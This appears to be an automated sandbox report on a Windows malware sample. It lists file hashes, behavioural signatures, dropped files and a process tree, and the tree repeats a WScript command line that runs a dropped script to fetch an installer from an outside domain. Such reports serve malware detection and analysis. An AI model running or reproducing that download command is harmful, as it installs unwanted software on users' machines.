Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    25/05/2024, 09:40

General

  • Target

    71913d5052192b0b1ef05360acdbf1b9_JaffaCakes118.exe

  • Size

    184KB

  • MD5

    71913d5052192b0b1ef05360acdbf1b9

  • SHA1

    ddb709c9a4d9b88bb85ba412c6cbc64b8d12a4bd

  • SHA256

    3d0d95b56a60f77356c232c41e08cd959c2c6643e6eace94e64b631e5e77a974

  • SHA512

    fd6c1db9a822174404bd9f7ed881853dfef16276ac8e8a988f206d791924626d0d3dbb44e98221ceb910d73acd890e1cda59402a0dbf2becc39d67424cee5519

  • SSDEEP

    3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3T:/7BSH8zUB+nGESaaRvoB7FJNndnG

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 11 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\71913d5052192b0b1ef05360acdbf1b9_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\71913d5052192b0b1ef05360acdbf1b9_JaffaCakes118.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2852
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf703.js" http://www.djapp.info/?domain=UmXTEXABXM.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgEFQ2K333LrcSBcSC5AosQUy-wm7otAI4nS08rU C:\Users\Admin\AppData\Local\Temp\fuf703.exe
      2⤵
      • Blocklisted process makes network request
      PID:2332
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf703.js" http://www.djapp.info/?domain=UmXTEXABXM.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgEFQ2K333LrcSBcSC5AosQUy-wm7otAI4nS08rU C:\Users\Admin\AppData\Local\Temp\fuf703.exe
      2⤵
      • Blocklisted process makes network request
      PID:1512
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf703.js" http://www.djapp.info/?domain=UmXTEXABXM.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgEFQ2K333LrcSBcSC5AosQUy-wm7otAI4nS08rU C:\Users\Admin\AppData\Local\Temp\fuf703.exe
      2⤵
      • Blocklisted process makes network request
      PID:2004
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf703.js" http://www.djapp.info/?domain=UmXTEXABXM.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgEFQ2K333LrcSBcSC5AosQUy-wm7otAI4nS08rU C:\Users\Admin\AppData\Local\Temp\fuf703.exe
      2⤵
      • Blocklisted process makes network request
      PID:1880
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf703.js" http://www.djapp.info/?domain=UmXTEXABXM.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgEFQ2K333LrcSBcSC5AosQUy-wm7otAI4nS08rU C:\Users\Admin\AppData\Local\Temp\fuf703.exe
      2⤵
      • Blocklisted process makes network request
      PID:1584

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

    Filesize

    1KB

    MD5

    6f6e3fca3096a0e7e7eb59d51f4a5350

    SHA1

    c978fa12d9045c593d5e7e097037ee465e09c3b2

    SHA256

    d27a9ba9c11dbd9c2b2bcb61a4128f457e7d15a3db20fad170588821e4003d78

    SHA512

    c45004cb6359a32eb55f1f2ff762ab948d79991ec890ceaf988d513ff9cd4dc0168deb2235b391b43ca8d69d960ba302fde0ed13a2b0e1dddbd63135f27cb546

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

    Filesize

    724B

    MD5

    8202a1cd02e7d69597995cabbe881a12

    SHA1

    8858d9d934b7aa9330ee73de6c476acf19929ff6

    SHA256

    58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

    SHA512

    97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

    Filesize

    410B

    MD5

    a767597625755dbcba728f909a90e772

    SHA1

    e71ec9c2592a1f000af4353853730114273b0c95

    SHA256

    19a5a3f3ee78215620dee3f5d7e44500a1e406930084ad8288f8fab7d8ac842b

    SHA512

    a0f73ee1006016834a0f131c4616fbcbfb5bf20cd089e38d0f7b7fa114abec1019470202b51554dda3d0a8d24bd8bce50ab64d20dce3cda741d73554b91b8dd0

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    be7306b8ae808d25f0e4563e9909909c

    SHA1

    df26d08eb0c2339f842354fc8d238f7fdb57d033

    SHA256

    af29f19400224c723111f2458b57fd0f7ed85ddc07d801cc75271b783f57a772

    SHA512

    10d6a4dd094b575c3c8a7397819a23b73fb357701705f7dc6112aa9802029a1c9c4753eb160f2cdb411a7a182444cba7204c01c0819518d8a6675c86280a424a

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

    Filesize

    392B

    MD5

    a30eaaffc0d911de973cb43056a30031

    SHA1

    8156dcc4133b1d14b21aad5e9d6ed977bc34a73a

    SHA256

    5e45d84748be2f28f0e2949f24baa6778f8daef89e8ab874f73017414e98d760

    SHA512

    e340758bc308c6a7ccfdb30980cba0e1c81ff4ad080fcd2e3ba6099692a7bf0738ceaa349bfddad16f69f8be0d9896a5a1a084e667627ed47b8cde59742d6182

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MPR7YYBV\domain_profile[1].htm

    Filesize

    40KB

    MD5

    e7076b6f67a10b2c44b9161774bcdffe

    SHA1

    03b90fac8d5322ac045162465258015b6cfb3e02

    SHA256

    5c97d3b0635482b6c97262d821d74fedab12affe33da7644276075930e7f1549

    SHA512

    a21c742160c98284f92248b0e5a8d919c3c2326868cd986322da357eaa965aa8bde651e6cea44c4f4dedc6f142d892aed7c11439af1ebb023ef3f04e72f5dcc4

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MPR7YYBV\domain_profile[1].htm

    Filesize

    40KB

    MD5

    0843a34f309bb3b6505e8bf8848ad6a2

    SHA1

    8bc379d2d5ec05287ead1ae9baa2574963add88f

    SHA256

    7ed0591e0aea729542c6fff663f19b74ef8d6faea80c6c287518054da846db06

    SHA512

    bee01be0e854639d931f942781ce067cc9b796565dd1a151f824c7051a163f3962b775a649c5fe9a8963381305890d0bc8a1e6db978bc58f2ec6792e97d96f5e

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VIF0OH2A\domain_profile[1].htm

    Filesize

    6KB

    MD5

    b1306e2f1fbbc9643559ece81a332abb

    SHA1

    a46d61603a137f0081497350fd58001506ce3d95

    SHA256

    f5acb7e38475c6cfc691ad0262ea4fa0bda3ce38888bdb9faf33c15513675d86

    SHA512

    cd7b7d4b49b178c3bbfd5070b48a2a0c655dfab4d10545e85e1c589233d9948f7395413d132c758e157fae822b80d66a760942526aa3c8d44faf4149c42e651f

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VIF0OH2A\domain_profile[1].htm

    Filesize

    40KB

    MD5

    8352ba8a31ad6775f017f48342e95436

    SHA1

    610421c2b3fa108402193aece59361237c60a0eb

    SHA256

    c8e8c61fefc6039c308606bb27ee6f33bd8584560b64433da7f4ec03421895ae

    SHA512

    9e28162d983895a1b4e9dd75cfd51b907a154b174e5a6d9348b449c915232ba195c05e6189f6d178919813431744a5609bcb3f542886cc8edec6455a94bc9ebc

  • C:\Users\Admin\AppData\Local\Temp\Cab368B.tmp

    Filesize

    65KB

    MD5

    ac05d27423a85adc1622c714f2cb6184

    SHA1

    b0fe2b1abddb97837ea0195be70ab2ff14d43198

    SHA256

    c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

    SHA512

    6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

  • C:\Users\Admin\AppData\Local\Temp\Tar4EDC.tmp

    Filesize

    171KB

    MD5

    9c0c641c06238516f27941aa1166d427

    SHA1

    64cd549fb8cf014fcd9312aa7a5b023847b6c977

    SHA256

    4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

    SHA512

    936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

  • C:\Users\Admin\AppData\Local\Temp\fuf703.js

    Filesize

    3KB

    MD5

    3813cab188d1de6f92f8b82c2059991b

    SHA1

    4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

    SHA256

    a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

    SHA512

    83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\50BXBOCJ.txt

    Filesize

    177B

    MD5

    4759041208612cfd9ff056b0a7769b42

    SHA1

    76008b528aca1deff8456ca85511f3332e4a7b5e

    SHA256

    c3563a0df75899d987bb97de24f4ca27f004a8d7852000de67917e2ca78ae15f

    SHA512

    c9e96dfd45e96faf9a36fee55bf14b2e909a1aad4b50707780f2abfc2ce71db3b070d7def1fc78a9800698dea8b24776ec3c50c67806c5fb83cfe742143deda1